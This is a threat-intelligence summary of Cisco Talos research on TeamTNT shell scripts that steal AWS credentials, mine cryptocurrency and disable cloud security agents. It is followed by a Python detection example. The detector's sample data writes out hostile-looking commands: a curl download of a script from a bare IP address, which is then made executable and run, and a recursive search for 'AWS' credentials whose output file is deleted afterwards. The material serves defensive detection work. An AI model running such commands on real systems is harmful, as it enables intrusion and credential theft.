TeamTNT Scripts

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos has examined a set of script files used by the threat group TeamTNT against AWS and Alibaba cloud environments. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. Their capabilities vary: they can initiate cryptocurrency mining, gather credentials, download additional payloads, modify file permissions, disable security tools, and achieve persistence and lateral movement. One AWS credential discovery and theft script, "GRABBER_aws_cloud.sh", enumerates the host's directories searching for the string "AWS"; when matches are found, the script writes the results to a file, exfiltrates that data, and then deletes the file it created. Scripts that download payloads often check the system's architecture first so that a compatible payload is fetched for execution. TeamTNT is proficient in the cloud space: beyond its collection of robust scripts, the group has adopted techniques, observed by Trend Micro, Cado Security, and Cisco Talos, for disabling cloud security agents and cloud logging. While agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted, Cisco Talos observed notable omissions: "TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools."

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
      • Locate Credentials
      • Linux CURL or WGET Direct to IPv4 Address
      • File Download (Unix)
      • Rare shell script execution
      • Service Stop Commands
      • Output to File
      • Modify File Attributes
      • New Linux Service Started/Enabled
      • File Modified for Execution
      • File Execution (Unix)
      • New Docker Container
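As an added example, not code from the Talos report or from Anvilogic's detection content, the following Python correlates the behaviours described above (download from a bare IPv4 address, file made executable, then executed; credential search redirected to a file that is later removed) over constructed process-execution events. The rule names, the sample command lines and the 198.51.100.7 address are assumptions chosen for illustration.

```python
import re

# Constructed sample of process-execution events as (timestamp, user, command line).
# These values are invented for this example and are not telemetry from the Talos report.
SAMPLE_EVENTS = [
    (100, "root", "curl -s http://198.51.100.7/x/tnt.sh -o /tmp/tnt.sh"),
    (101, "root", "chmod +x /tmp/tnt.sh"),
    (102, "root", "/tmp/tnt.sh"),
    (103, "root", "grep -rli AWS /home /root > /tmp/aws.txt"),
    (104, "root", "rm -f /tmp/aws.txt"),
    (200, "alice", "curl -s https://example.com/readme.txt -o /tmp/readme.txt"),
]

DIRECT_IP_URL = re.compile(r"\bhttps?://\d{1,3}(?:\.\d{1,3}){3}\b")   # URL host is a bare IPv4
OUTPUT_OPT = re.compile(r"-[oO]\s+(\S+)")                              # curl -o / wget -O <path>
CHMOD = re.compile(r"^chmod\s+(\S+)\s+(\S+)")                          # chmod <mode> <path>
CRED_SEARCH = re.compile(r"^(?:grep|find)\b.*\bAWS\b.*>\s*(\S+)")      # search for "AWS" redirected to a file

def grants_exec(mode):
    """True for 'chmod +x' style modes or octal modes with any execute bit set."""
    return "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode[-3:]))

def detect(events, window=300):
    """Correlate events into alerts; returns a list of (rule_name, timestamp, command)."""
    alerts, downloaded, made_exec, dumped = [], {}, {}, {}
    for ts, user, cmd in events:
        argv0 = cmd.split()[0]
        if argv0 in ("curl", "wget") and DIRECT_IP_URL.search(cmd):
            alerts.append(("linux_curl_wget_direct_ipv4", ts, cmd))
            m = OUTPUT_OPT.search(cmd)
            if m:
                downloaded[m.group(1)] = ts          # remember where the payload landed
        elif (m := CHMOD.match(cmd)) and grants_exec(m.group(1)):
            alerts.append(("modify_file_attributes", ts, cmd))
            if m.group(2) in downloaded:
                made_exec[m.group(2)] = ts           # downloaded file was made executable
        elif argv0 in made_exec and ts - downloaded[argv0] <= window:
            alerts.append(("unix_file_download_modified_executed", ts, cmd))
        elif (m := CRED_SEARCH.match(cmd)):
            alerts.append(("locate_credentials_output_to_file", ts, cmd))
            dumped[m.group(1)] = ts                  # output file of the credential search
        elif argv0 == "rm" and any(p in dumped for p in cmd.split()[1:]):
            alerts.append(("credential_dump_file_removed", ts, cmd))
    return alerts

if __name__ == "__main__":
    for rule, ts, cmd in detect(SAMPLE_EVENTS):
        print(f"{ts} {rule}: {cmd}")
```

The benign download at the end (a hostname rather than an IPv4 literal, never chmod'ed or executed) produces no alert, which is the distinction the scenario relies on.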
